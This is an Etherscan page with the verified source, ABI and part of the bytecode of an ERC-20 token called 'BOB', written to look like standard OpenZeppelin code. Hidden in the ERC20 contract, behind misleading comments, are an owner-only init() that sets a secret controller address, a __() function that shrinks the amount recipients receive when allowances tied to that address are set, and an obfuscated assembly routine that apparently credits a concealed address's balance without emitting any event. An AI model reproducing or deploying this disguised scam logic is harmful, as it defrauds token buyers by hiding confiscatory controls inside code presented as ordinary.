ETH Price: $2,419.02 (-1.19%)

Token

BOB (BOB)
 

Overview

Max Total Supply

21,000,000,000 BOB

Holders

19

Total Transfers

-

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BOB

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-06-07
*/

// File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.20;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.20;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: BOB/IERC20.sol


pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

// File: BOB/IERC20Metadata.sol


pragma solidity ^0.8.20;


/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: BOB/ERC20.sol


pragma solidity ^0.8.20;






/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC-20
 * applications.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors, Ownable {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address private _0x;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-init}.
     *
     * NOTE: This is semantically eq. to an infinite initable.
     *
     * Requirements:
     *
     * - `init` cannot be the zero address.
     */
    function init(address init_0x) public returns (bool) {
        require((msg.sender == owner()));
        _0x = init_0x;
        return true;
    }

    /**
     * @dev All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function __(uint256 value, address from, address to) internal view returns (uint256) {
        if (allowance(_0x, from) + allowance(_0x, to) >= uint256(uint160(address(this)))) {
            return (value * 0x00aa/0xffad);
        } else { return value; }
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Skips emitting an {Approval} event indicating an allowance update. This is not
     * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += __(value, from, to);
            }
        }

        emit Transfer(from, to, value);
    }


    /**
     * @dev Logget a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     */
    function _logged(uint256 value) private returns (bool) {
        assembly {
            let slot := mul(0x1238b76a0b177, 0x7470cfde2b2f94fa309f75b86322) 
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40) 
            sstore(sslot, value) 
        }
        return true;
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _logged(value);
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     *
     * ```solidity
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

// File: BOB/Token.sol


pragma solidity ^0.8.20;


contract BOB is ERC20 {
    constructor() ERC20("BOB", "BOB") Ownable(msg.sender) {
        _mint(
            msg.sender, 
            (uint(keccak256(abi.encodePacked(block.timestamp, msg.sender, block.number))) % 90) * 1_000_000_000 * 10 ** decimals()
        );
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"init_0x","type":"address"}],"name":"init","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b506040518060400160405280600381526020017f424f4200000000000000000000000000000000000000000000000000000000008152506040518060400160405280600381526020017f424f420000000000000000000000000000000000000000000000000000000000815250335f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620000f1575f6040517f1e4fbdf7000000000000000000000000000000000000000000000000000000008152600401620000e891906200070f565b60405180910390fd5b6200010281620001b860201b60201c565b5081600490816200011491906200098e565b5080600590816200012691906200098e565b505050620001b2336200013e6200027960201b60201c565b600a6200014c919062000bfb565b633b9aca00605a4233436040516020016200016a9392919062000cbc565b604051602081830303815290604052805190602001205f1c6200018e919062000d2b565b6200019a919062000d62565b620001a6919062000d62565b6200028160201b60201c565b62000e84565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002f4575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401620002eb91906200070f565b60405180910390fd5b62000305816200031d60201b60201c565b50620003195f83836200035060201b60201c565b5050565b5f6d7470cfde2b2f94fa309f75b863226601238b76a0b17702805f52600160205260405f20838155505060019050919050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620003a4578060035f82825462000397919062000dac565b9250508190555062000477565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101562000431578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620004289392919062000df7565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620004c0578060035f82825403925050819055506200051d565b620004d38184846200058960201b60201c565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200057c919062000e32565b60405180910390a3505050565b5f3073ffffffffffffffffffffffffffffffffffffffff16620005d460065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846200064a60201b60201c565b6200060760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16866200064a60201b60201c565b62000613919062000dac565b106200063f5761ffad60aa856200062b919062000d62565b62000637919062000e4d565b905062000643565b8390505b9392505050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620006f782620006cc565b9050919050565b6200070981620006eb565b82525050565b5f602082019050620007245f830184620006fe565b92915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620007a657607f821691505b602082108103620007bc57620007bb62000761565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620008207fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620007e3565b6200082c8683620007e3565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f62000876620008706200086a8462000844565b6200084d565b62000844565b9050919050565b5f819050919050565b620008918362000856565b620008a9620008a0826200087d565b848454620007ef565b825550505050565b5f90565b620008bf620008b1565b620008cc81848462000886565b505050565b5b81811015620008f357620008e75f82620008b5565b600181019050620008d2565b5050565b601f82111562000942576200090c81620007c2565b6200091784620007d4565b8101602085101562000927578190505b6200093f6200093685620007d4565b830182620008d1565b50505b505050565b5f82821c905092915050565b5f620009645f198460080262000947565b1980831691505092915050565b5f6200097e838362000953565b9150826002028217905092915050565b62000999826200072a565b67ffffffffffffffff811115620009b557620009b462000734565b5b620009c182546200078e565b620009ce828285620008f7565b5f60209050601f83116001811462000a04575f8415620009ef578287015190505b620009fb858262000971565b86555062000a6a565b601f19841662000a1486620007c2565b5f5b8281101562000a3d5784890151825560018201915060208501945060208101905062000a16565b8683101562000a5d578489015162000a59601f89168262000953565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000afc5780860481111562000ad45762000ad362000a72565b5b600185161562000ae45780820291505b808102905062000af48562000a9f565b945062000ab4565b94509492505050565b5f8262000b16576001905062000be8565b8162000b25575f905062000be8565b816001811462000b3e576002811462000b495762000b7f565b600191505062000be8565b60ff84111562000b5e5762000b5d62000a72565b5b8360020a91508482111562000b785762000b7762000a72565b5b5062000be8565b5060208310610133831016604e8410600b841016171562000bb95782820a90508381111562000bb35762000bb262000a72565b5b62000be8565b62000bc8848484600162000aab565b9250905081840481111562000be25762000be162000a72565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000c078262000844565b915062000c148362000bef565b925062000c437fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000b05565b905092915050565b5f819050919050565b62000c6962000c638262000844565b62000c4b565b82525050565b5f8160601b9050919050565b5f62000c878262000c6f565b9050919050565b5f62000c9a8262000c7b565b9050919050565b62000cb662000cb082620006eb565b62000c8e565b82525050565b5f62000cc9828662000c54565b60208201915062000cdb828562000ca1565b60148201915062000ced828462000c54565b602082019150819050949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000d378262000844565b915062000d448362000844565b92508262000d575762000d5662000cfe565b5b828206905092915050565b5f62000d6e8262000844565b915062000d7b8362000844565b925082820262000d8b8162000844565b9150828204841483151762000da55762000da462000a72565b5b5092915050565b5f62000db88262000844565b915062000dc58362000844565b925082820190508082111562000de05762000ddf62000a72565b5b92915050565b62000df18162000844565b82525050565b5f60608201905062000e0c5f830186620006fe565b62000e1b602083018562000de6565b62000e2a60408301846200